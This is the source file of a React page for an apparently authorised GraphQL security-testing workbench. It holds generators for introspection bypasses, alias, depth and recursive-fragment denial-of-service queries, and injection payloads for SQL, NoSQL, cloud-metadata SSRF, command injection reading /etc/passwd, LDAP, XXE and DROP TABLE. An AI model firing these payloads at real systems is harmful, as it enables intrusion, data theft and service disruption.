import { useEffect, useMemo, useState } from 'react'
import { Link, useParams } from 'react-router-dom'
import { useMutation } from '@tanstack/react-query'
import { api, type RepeaterResponse } from '../../api/client'

const introspection = `query IntrospectionQuery {
  __schema { queryType { name } mutationType { name } subscriptionType { name } types { ...FullType } }
}
fragment FullType on __Type { kind name description fields(includeDeprecated: true) { name args { name type { kind name ofType { kind name } } } type { kind name ofType { kind name } } } inputFields { name type { kind name } } enumValues { name } possibleTypes { name } }`
const probe = '{ __schema { queryType { name } } }'
const bypassAlias = '{ s: __schema { types { name kind description } } }'
const bypassFragment = 'fragment SchemaFields on Query { __schema { types { name } } }\n{ ...SchemaFields }'
function deepQuery(root: string, depth: number) { let inner = 'id'; for (let i = 1; i < depth; i += 1) inner = `${root} { ${inner} }`; return `query DeepQuery { ${root} { ${inner} } }` }
function wideQuery(root: string, width: number) { return `query WideQuery {\n${Array.from({ length: width }, (_, i) => `  a${i + 1}: ${root} { id }`).join('\n')}\n}` }
function injection(field: string, arg: string, kind: string) { const values: Record<string, string> = { sql: "' OR 1=1--", nosql: '{"$regex":".*"}', ssrf: 'http://169.254.169.254/latest/meta-data/', cmd: '; id; cat /etc/passwd', template: '${7*7}', ldap: '*)(uid=*))(|(uid=*', xxe: '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>' }; return `query InjectTest {\n  ${field || 'search'}(${arg || 'query'}: "${values[kind] || 'TEST'}") { id }\n}` }

export function GraphqlPage() {
  const { projectId = '' } = useParams()
  const [endpoint, setEndpoint] = useState(() => localStorage.getItem('awe-graphql-endpoint') || '')
  const [query, setQuery] = useState(() => localStorage.getItem('awe-graphql-query') || probe)
  const [variables, setVariables] = useState(() => localStorage.getItem('awe-graphql-vars') || '{}')
  const [headers, setHeaders] = useState(() => localStorage.getItem('awe-graphql-headers') || '{}')
  const [method, setMethod] = useState<'POST' | 'GET'>('POST'); const [response, setResponse] = useState<RepeaterResponse | null>(null); const [error, setError] = useState(''); const [log, setLog] = useState(''); const [schema, setSchema] = useState<Record<string, unknown> | null>(null)
  const [field, setField] = useState('search'); const [argument, setArgument] = useState('query'); const [root, setRoot] = useState('user'); const [count, setCount] = useState(10); const [depth, setDepth] = useState(8)
  const send = useMutation({ mutationFn: async () => { if (!endpoint.trim()) throw new Error('Set a GraphQL endpoint first'); let parsedHeaders: Record<string, string> = {}; try { parsedHeaders = JSON.parse(headers || '{}') } catch { throw new Error('Headers must be valid JSON') } let parsedVariables: Record<string, unknown> = {}; try { parsedVariables = JSON.parse(variables || '{}') } catch { throw new Error('Variables must be valid JSON') } const body = method === 'GET' ? '' : JSON.stringify({ query, variables: parsedVariables }); const url = method === 'GET' ? `${endpoint}${endpoint.includes('?') ? '&' : '?'}query=${encodeURIComponent(query)}${Object.keys(parsedVariables).length ? `&variables=${encodeURIComponent(JSON.stringify(parsedVariables))}` : ''}` : endpoint; return api.sendRepeater(projectId, { method, url, headers: { 'Content-Type': 'application/json', ...parsedHeaders }, body }) }, onSuccess: result => { setResponse(result); setError(''); setLog(old => `${old}\n✓ ${result.status_code} ${result.reason} · ${result.elapsed_ms} ms`.trim()); try { const parsed = JSON.parse(result.body); const found = parsed.data?.__schema || parsed.__schema; if (found) setSchema(found) } catch { /* raw response remains available */ } }, onError: caught => { setError(caught instanceof Error ? caught.message : 'GraphQL request failed') } })
  useEffect(() => { localStorage.setItem('awe-graphql-endpoint', endpoint); localStorage.setItem('awe-graphql-query', query); localStorage.setItem('awe-graphql-vars', variables); localStorage.setItem('awe-graphql-headers', headers) }, [endpoint, query, variables, headers])
  const preview = useMemo(() => { try { const parsed = JSON.parse(variables || '{}'); const body = JSON.stringify({ query, variables: parsed }, null, 2); return { body, curl: `curl -X ${method} '${endpoint || 'https://target/graphql'}' -H 'Content-Type: application/json'${method === 'POST' ? ` --data '${body.replace(/'/g, "'\\''")}'` : `?query=${encodeURIComponent(query)}`}`, error: '' } } catch { return { body: '', curl: '', error: 'Variables must be valid JSON' } } }, [endpoint, query, variables, method])
  function setGenerated(next: string, label: string) { setQuery(next); setLog(old => `${old}\n${label}`.trim()) }
  function run(next?: string) { if (next) setQuery(next); setTimeout(() => send.mutate(), 0) }
  const schemaTypes = Array.isArray(schema?.types) ? schema.types as Array<{ name?: string; kind?: string; fields?: Array<{ name?: string; type?: { name?: string; kind?: string } }> }> : []
  return <main className="page feature-page graphql-page"><Link className="back-link" to={`/projects/${projectId}`}>← Project workspace</Link><header className="page-header"><div><p className="eyebrow">API security workbench</p><h1>GraphQL</h1><p className="muted">Execute, introspect, browse schemas, and generate authorised GraphQL security test cases.</p></div></header>
    <section className="panel graphql-toolbar"><label>Endpoint<input value={endpoint} onChange={event => setEndpoint(event.target.value)} placeholder="https://target.example/graphql" /></label><label>Method<select value={method} onChange={event => setMethod(event.target.value as 'GET' | 'POST')}><option>POST</option><option>GET</option></select></label><button className="graphql-run" disabled={send.isPending} onClick={() => run()}>{send.isPending ? 'Sending…' : '▶ Send query'}</button></section>
    <section className="graphql-workbench"><div className="graphql-left"><article className="panel graphql-editor"><header><b>Query</b><div><button onClick={() => setGenerated(probe, 'Introspection probe loaded')}>Probe</button><button onClick={() => setGenerated(introspection, 'Full introspection loaded')}>Full schema</button><button onClick={() => setGenerated(bypassAlias, 'Alias bypass loaded')}>Alias bypass</button><button onClick={() => setGenerated(bypassFragment, 'Fragment bypass loaded')}>Fragment bypass</button></div></header><textarea value={query} onChange={event => setQuery(event.target.value)} spellCheck={false}/></article><div className="graphql-edit-row"><label className="panel"><span>Variables (JSON)</span><textarea value={variables} onChange={event => setVariables(event.target.value)} spellCheck={false}/></label><label className="panel"><span>Headers (JSON)</span><textarea value={headers} onChange={event => setHeaders(event.target.value)} spellCheck={false}/></label></div><section className="panel graphql-response"><header><b>Response {response && `${response.status_code} ${response.reason}`}</b><button onClick={() => navigator.clipboard.writeText(response?.body || '')}>Copy response</button></header><pre>{response?.body || 'Send a query to inspect the response.'}</pre></section></div>
      <aside className="panel graphql-attacks"><h3>Security generators</h3><h4>Batch / DoS</h4><input value={root} onChange={event => setRoot(event.target.value)} placeholder="Root field"/><div className="graphql-inline"><input type="number" min="1" max="1000" value={count} onChange={event => setCount(Number(event.target.value))}/><button onClick={() => setGenerated(`{\n${Array.from({ length: count }, (_, i) => `  a${i + 1}: ${root} { id }`).join('\n')}\n}`, `Alias batch (${count}) generated`)}>Alias batch</button></div><div className="graphql-inline"><input type="number" min="2" max="100" value={depth} onChange={event => setDepth(Number(event.target.value))}/><button onClick={() => setGenerated(deepQuery(root, depth), `Deep query (${depth}) generated`)}>Deep query</button></div><button onClick={() => setGenerated(wideQuery(root, count), `Wide query (${count}) generated`)}>Wide query</button><button onClick={() => setGenerated(`fragment A on SomeType { ...B }\nfragment B on SomeType { ...A }\n{ ${root} { ...A } }`, 'Recursive fragment generated')}>Recursive fragment</button><h4>Injection probes</h4><input value={field} onChange={event => setField(event.target.value)} placeholder="Field"/><input value={argument} onChange={event => setArgument(event.target.value)} placeholder="Argument"/><div className="graphql-button-grid">{['sql', 'nosql', 'ssrf', 'cmd', 'template', 'ldap', 'xxe'].map(kind => <button key={kind} onClick={() => setGenerated(injection(field, argument, kind), `${kind.toUpperCase()} probe generated`)}>{kind}</button>)}</div><h4>Other probes</h4><button onClick={() => setGenerated('{ __typename }', '__typename probe generated')}>__typename</button><button onClick={() => setGenerated('{ __schema { types { name fields(includeDeprecated: true) { name isDeprecated deprecationReason } } } }', 'Deprecated fields probe generated')}>Deprecated fields</button><button onClick={() => setGenerated('query TypeConfusion($val: String) { user(id: $val) { id } }', 'Type confusion generated')}>Type confusion</button><button onClick={() => setGenerated('query \' ; DROP TABLE users-- { __typename }', 'Operation-name injection generated')}>Operation-name injection</button><button onClick={() => setGenerated('{ __typename }', 'Null-auth query generated; remove Authorization header before sending')}>Null-auth reminder</button><h4>Schema browser</h4>{schema ? <div className="graphql-schema-tree"><b>Query: {(schema.queryType as { name?: string })?.name || '—'}</b><b>Mutation: {(schema.mutationType as { name?: string })?.name || '—'}</b>{schemaTypes.filter(type => type.name && !type.name.startsWith('__')).map(type => <details key={type.name}><summary>{type.name} <small>{type.kind}</small></summary>{type.fields?.map(item => <code key={item.name}>{item.name}: {item.type?.name || item.type?.kind || '?'}</code>)}</details>)}</div> : <small className="muted">Run full introspection to populate the schema.</small>}</aside></section>
    <section className="panel graphql-preview"><header><b>Raw request / cURL preview</b><button disabled={!preview.curl} onClick={() => navigator.clipboard.writeText(preview.curl)}>Copy cURL</button></header><pre>{preview.curl || preview.error}</pre></section>{(error || send.isError) && <p className="error">{error || (send.error as Error)?.message}</p>}{log && <section className="panel graphql-log"><header><b>Activity</b><button onClick={() => setLog('')}>Clear</button></header><pre>{log}</pre></section>}
  </main>
}
